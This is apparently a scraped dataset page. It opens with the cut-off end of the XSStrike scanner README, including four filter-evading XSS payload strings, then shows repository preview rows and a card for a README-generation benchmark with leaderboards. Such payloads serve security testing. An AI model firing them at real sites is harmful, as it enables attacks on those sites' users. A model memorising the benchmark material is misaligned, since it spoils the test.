Instead of injecting payloads and checking whether they work like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine.
Here are some examples of the payloads generated by XSStrike:
```
}]};(confirm)()//\
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
```
Apart from that, XSStrike has crawling, fuzzing, parameter discovery and WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.
### Main Features
- Reflected and DOM XSS scanning
- Multi-threaded crawling
- Context analysis
- Configurable core
- WAF detection & evasion
- Outdated JS lib scanning
- Intelligent payload generator
- Handmade HTML & JavaScript parser
- Powerful fuzzing engine
- Blind XSS support
- Highly researched work-flow
- Complete HTTP support
- Bruteforce payloads from a file
- Powered by [Photon](https://github.com/s0md3v/Photon), [Zetanize](https://github.com/s0md3v/zetanize) and [Arjun](https://github.com/s0md3v/Arjun)
- Payload Encoding
### Documentation
- [Usage](https://github.com/s0md3v/XSStrike/wiki/Usage)
- [Compatibility & Dependencies](https://github.com/s0md3v/XSStrike/wiki/Compatibility-&-Dependencies)
### FAQ
- [It says fuzzywuzzy isn't installed but it is.](https://github.com/s0md3v/XSStrike/wiki/FAQ#it-says-fuzzywuzzy-is-not-installed-but-its)
- [What's up with Blind XSS?](https://github.com/s0md3v/XSStrike/wiki/FAQ#whats-up-with-blind-xss)
- [Why XSStrike boasts that it is the most advanced XSS detection suite?](https://github.com/s0md3v/XSStrike/wiki/FAQ#why-xsstrike-boasts-that-it-is-the-most-advanced-xss-detection-suite)
- [I like the project, what enhancements and features I can expect in future?](https://github.com/s0md3v/XSStrike/wiki/FAQ#i-like-the-project-what-enhancements-and-features-i-can-expect-in-future)
- [What's the false positive/negative rate?](https://github.com/s0md3v/XSStrike/wiki/FAQ#whats-the-false-positivenegative-rate)
- [Tool xyz works against the target, while XSStrike doesn't!](https://github.com/s0md3v/XSStrike/wiki/FAQ#tool-xyz-works-against-the-target-while-xsstrike-doesnt)
- [Can I copy it's code?](https://github.com/s0md3v/XSStrike/wiki/FAQ#can-i-copy-its-code)
- [What if I want to embed it into a proprietary software?](https://github.com/s0md3v/XSStrike/wiki/FAQ#what-if-i-want-to-embed-it-into-a-proprietary-software)
### Gallery
#### DOM XSS
![dom xss](https://image.ibb.co/bQaQ5L/Screenshot-2018-11-19-13-48-19.png)
#### Reflected XSS
![multi xss](https://image.ibb.co/gJogUf/Screenshot-2018-11-19-14-19-36.png)
#### Crawling
![crawling](https://image.ibb.co/e6Rezf/Screenshot-2018-11-19-13-50-59.png)
#### Fuzzing
![fuzzing](https://image.ibb.co/fnhuFL/Screenshot-2018-11-19-14-04-46.png)
#### Bruteforcing payloads from a file
![bruteforcing](https://image.ibb.co/dy5EFL/Screenshot-2018-11-19-14-08-36.png)
#### Interactive HTTP Headers Prompt
![headers](https://image.ibb.co/ecNph0/Screenshot-2018-11-19-14-29-35.png)
#### Hidden Parameter Discovery
![arjun](https://image.ibb.co/effjh0/Screenshot-2018-11-19-14-16-51.png)
### Contribution, Credits & License
Ways to contribute
- Suggest a feature
- Report a bug
- Fix something and open a pull request
- Help me document the code
- Spread the word
Licensed under the GNU GPLv3, see [LICENSE](LICENSE) for more information.
The WAF signatures in `/db/wafSignatures.json` are taken & modified from [sqlmap](https://github.com/sqlmapproject/sqlmap). I extracted them from sqlmap's waf detection modules which can be found [here](https://github.com/sqlmapproject/sqlmap/blob/master/waf/) and converted them to JSON.\
`/plugins/retireJS.py` is a modified version of [retirejslib](https://github.com/FallibleInc/retirejslib/).

| repo_name | repo_commit | repo_content | repo_readme |
|---|---|---|---|
ItChat | d5ce5db32ca15cef8eefa548a438a9fcc4502a6d | "File: setup.py\n\n\"\"\" A wechat personal account api project\nSee:\nhttps://github.com/littlecode(...TRUNCATED) | "# itchat\n\n[![Gitter][gitter-picture]][gitter] ![py27][py27] ![py35][py35] [English version][engli(...TRUNCATED) |
babyagi | 11c853dbfc087cd96e034e7488d6f895248ba63a | "File: babyagi.py\n\n#!/usr/bin/env python3\nfrom dotenv import load_dotenv\n\n# Load default enviro(...TRUNCATED) | "# Translations:\n\n[<img title=\"عربي\" alt=\"عربي\" src=\"https://cdn.staticaly.com/gh/hjn(...TRUNCATED) |
OpenVoice | f3cf835540572ade1460c8952f39d53e4f7952df | "File: setup.py\n\nfrom setuptools import setup, find_packages\n\n\nsetup(name='MyShell-OpenVoice',\(...TRUNCATED) | "<div align=\"center\">\n <div> </div>\n <img src=\"resources/openvoicelogo.jpg\" width=\"400(...TRUNCATED) |
cli | f4cf43ecdd6c5c52b5c4ba91086d5c6ccfebcd6d | "File: setup.py\n\nfrom setuptools import setup\n\nsetup()\n\n\n\nFile: docs/installation/generate.p(...TRUNCATED) | "<h2 align=\"center\">\n <a href=\"https://httpie.io\" target=\"blank_\">\n <img height=\"(...TRUNCATED) |
awesome-machine-learning | 4964cff36225e9951c6c6a398fb925f269532b1b | "File: scripts/pull_R_packages.py\n\n#!/usr/bin/python\n\n\"\"\"\n This script will scrape the r-(...TRUNCATED) | "# Awesome Machine Learning [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78(...TRUNCATED) |
interactive-coding-challenges | 358f2cc60426d5c4c3d7d580910eec9a7b393fa9 | "File: __init__.py\n\n\n\n\nFile: recursion_dynamic/__init__.py\n\n\n\n\nFile: recursion_dynamic/pow(...TRUNCATED) | "<br/>\n<p align=\"center\">\n <img src=\"https://raw.githubusercontent.com/donnemartin/interactive(...TRUNCATED) |
MHDDoS | 74a6d0ca4aeecb92ebc8f38917c722bc4226ebde | "File: start.py\n\n#!/usr/bin/env python3\n \nfrom concurrent.futures import ThreadPoolExecutor, as_(...TRUNCATED) | "<p align=\"center\"><img src=\"https://i.ibb.co/3F6V9JQ/MHDDoS.png\" width=\"400px\" height=\"150px(...TRUNCATED) |
llama | 8fac8befd776bc03242fe7bc2236cdb41b6c609c | "File: example_text_completion.py\n\n# Copyright (c) Meta Platforms, Inc. and affiliates.\n# This so(...TRUNCATED) | "## **Note of deprecation**\n\nThank you for developing with Llama models. As part of the Llama 3.1 (...TRUNCATED) |
python-mini-projects | e0cfd4b0fe5e0bb4d443daba594e83332d5fb720 | "File: projects/birthDateToCurrentAge.py\n\nfrom datetime import date # import(...TRUNCATED) | "<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![forthebadge](https(...TRUNCATED) |
# Generate README Eval
The generate-readme-eval is a dataset (train split) and benchmark (test split) for evaluating how effectively LLMs summarize entire GitHub repos in the form of a README.md file. The dataset is curated from the top 400 real Python repositories on GitHub with at least 1000 stars and 100 forks. The script used to generate the dataset can be found here.

For the dataset we restrict ourselves to GitHub repositories that are less than 100k tokens in size, which allows us to put an entire repo into the context of an LLM in a single call. The train split of the dataset can be used to fine-tune your own model; the results reported here are for the test split.
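
To experiment with the splits, here is a minimal sketch using the Hugging Face `datasets` library; the dataset id shown is an assumption, not a verified repo id, and the column names match the schema above:

```python
# Minimal sketch: load the benchmark splits with the Hugging Face datasets
# library. The dataset id below is a placeholder assumption.
from datasets import load_dataset

train = load_dataset("generate-readme-eval", split="train")  # fine-tuning data
test = load_dataset("generate-readme-eval", split="test")    # benchmark data

example = test[0]
print(example["repo_name"], len(example["repo_content"]))
```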
To evaluate an LLM on the benchmark we can use the evaluation script given here. During evaluation we prompt the LLM to generate a structured README.md file from the entire contents of the repository (`repo_content`). We then evaluate the generated response by comparing it with the actual README file of that repository across several different metrics.
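
The overall flow can be pictured with this sketch; `generate_readme` and `compute_metrics` are hypothetical stand-ins for the model call and the benchmark's metric suite, not the actual script's API:

```python
# Hypothetical shape of the evaluation loop (names are illustrative).
def evaluate_model(test_split, generate_readme, compute_metrics):
    scores = []
    for example in test_split:
        generated = generate_readme(example["repo_content"])
        scores.append(compute_metrics(generated, example["repo_readme"]))
    return sum(scores) / len(scores)  # average score over the test split
```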
In addition to traditional NLP metrics like BLEU, ROUGE scores and cosine similarity, we also compute custom metrics that capture structural similarity, code consistency (from code to README), readability (Flesch Reading Ease, FRES) and information retrieval. The final score is generated by taking a weighted average of the metrics; the weights used are shown below.
```python
weights = {
    'bleu': 0.1,
    'rouge-1': 0.033,
    'rouge-2': 0.033,
    'rouge-l': 0.034,
    'cosine_similarity': 0.1,
    'structural_similarity': 0.1,
    'information_retrieval': 0.2,
    'code_consistency': 0.2,
    'readability': 0.2
}
```
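
Note that the weights sum to 1.0, so the final score lives on the same scale as the individual metrics. A small sketch of the combination step, assuming each metric has already been normalized to a 0-100 scale:

```python
# Sketch: combine per-metric values into the final score. The metric values
# are assumed to be normalized to a common 0-100 scale before weighting.
def final_score(metrics: dict, weights: dict) -> float:
    return sum(w * metrics[name] for name, w in weights.items())
```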
At the end of the evaluation the script prints the metrics and stores the entire run in a log file. If you want to add your model to the leaderboard, please create a PR with the log file of the run and details about the model.

If we use the existing README.md files in the repositories as the golden output, we get a score of 56.79 on this benchmark. We can validate this by running the evaluation script with the `--oracle` flag; the oracle run log is available here. The oracle does not reach 100 because several metrics are not computed against the reference README: as the oracle row below shows, even the reference files score only 59.00 on information retrieval, 11.01 on code consistency and 14.84 on readability.
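
Conceptually, the oracle run scores each reference README against itself; a sketch, with `score_fn` as a hypothetical stand-in for the benchmark's composite scoring function:

```python
# Sketch of the oracle run: score each reference README against itself.
# score_fn stands in for the benchmark's composite metric (assumed name).
from statistics import mean

def oracle_score(test_split, score_fn):
    return mean(score_fn(ex["repo_readme"], ex["repo_readme"]) for ex in test_split)
```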
## Leaderboard
The current SOTA model on this benchmark in the zero-shot setting is Gemini-1.5-Flash-Exp-0827, which scores the highest across a number of different metrics.
| Model | Score | BLEU | ROUGE-1 | ROUGE-2 | ROUGE-l | Cosine-Sim | Structural-Sim | Info-Ret | Code-Consistency | Readability | Logs |
|---|---|---|---|---|---|---|---|---|---|---|---|
| llama3.1-8b-instruct | 24.43 | 0.72 | 11.96 | 1.69 | 11.51 | 30.29 | 24.16 | 44.50 | 7.96 | 37.90 | link |
| mistral-nemo-instruct-2407 | 25.62 | 1.09 | 11.24 | 1.70 | 10.94 | 26.62 | 24.26 | 52.00 | 8.80 | 37.30 | link |
| gpt-4o-mini-2024-07-18 | 32.16 | 1.64 | 15.46 | 3.85 | 14.84 | 40.57 | 23.81 | 72.50 | 4.77 | 44.81 | link |
| gpt-4o-2024-08-06 | 33.13 | 1.68 | 15.36 | 3.59 | 14.81 | 40.00 | 23.91 | 74.50 | 8.36 | 44.33 | link |
| o1-mini-2024-09-12 | 33.05 | 3.13 | 15.39 | 3.51 | 14.81 | 42.49 | 27.55 | 80.00 | 7.78 | 35.27 | link |
| gemini-1.5-flash-8b-exp-0827 | 32.12 | 1.36 | 14.66 | 3.31 | 14.14 | 38.31 | 23.00 | 70.00 | 7.43 | 46.47 | link |
| gemini-1.5-flash-exp-0827 | 33.43 | 1.66 | 16.00 | 3.88 | 15.33 | 41.87 | 23.59 | 76.50 | 7.86 | 43.34 | link |
| gemini-1.5-pro-exp-0827 | 32.51 | 2.55 | 15.27 | 4.97 | 14.86 | 41.09 | 23.94 | 72.82 | 6.73 | 43.34 | link |
| oracle-score | 56.79 | 100.00 | 100.00 | 100.00 | 100.00 | 100.00 | 98.24 | 59.00 | 11.01 | 14.84 | link |
## Few-Shot
This benchmark is interesting because it is not easy to few-shot your way to better performance. There are a couple of reasons for that:

- The average context length required for each item can be up to 100k tokens, which puts the benchmark out of reach of most models except Google Gemini, which supports a context length of up to 2 million tokens.
- There is an accuracy trade-off inherent in the benchmark: adding more examples makes some of the metrics, like `information_retrieval` and `readability`, worse. At larger contexts, models do not have perfect recall and may miss important information.

Our experiments with few-shot prompts confirm this: the maximum overall score is reached at 1-shot, and adding more examples doesn't help after that. The results are below; a sketch of the k-shot prompt construction follows the table.
| Model | Score | BLEU | ROUGE-1 | ROUGE-2 | ROUGE-l | Cosine-Sim | Structural-Sim | Info-Ret | Code-Consistency | Readability | Logs |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 0-shot-gemini-1.5-flash-exp-0827 | 33.43 | 1.66 | 16.00 | 3.88 | 15.33 | 41.87 | 23.59 | 76.50 | 7.86 | 43.34 | link |
| 1-shot-gemini-1.5-flash-exp-0827 | 35.40 | 21.81 | 34.00 | 24.97 | 33.61 | 61.53 | 37.60 | 61.00 | 12.89 | 27.22 | link |
| 3-shot-gemini-1.5-flash-exp-0827 | 33.10 | 20.02 | 32.70 | 22.66 | 32.21 | 58.98 | 34.54 | 60.50 | 13.09 | 20.52 | link |
| 5-shot-gemini-1.5-flash-exp-0827 | 33.97 | 19.24 | 32.31 | 21.48 | 31.74 | 61.49 | 33.17 | 59.50 | 11.48 | 27.65 | link |
| 7-shot-gemini-1.5-flash-exp-0827 | 33.00 | 15.43 | 28.52 | 17.18 | 28.07 | 56.25 | 33.55 | 63.50 | 12.40 | 24.15 | link |
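
For reference, k-shot prompts can be assembled from the train split along these lines; the wording is illustrative, not the exact prompt used in the runs above:

```python
# Sketch of k-shot prompt construction from the train split (illustrative).
def build_prompt(repo_content, shots):
    parts = []
    for shot in shots:  # k examples drawn from the train split
        parts.append("Repository:\n" + shot["repo_content"])
        parts.append("README:\n" + shot["repo_readme"])
    parts.append("Repository:\n" + repo_content)
    parts.append("README:\n")
    return "\n\n".join(parts)
```

Since a single repository can be close to 100k tokens, each added shot grows the prompt by roughly that much, which is consistent with the recall degradation observed in the table above.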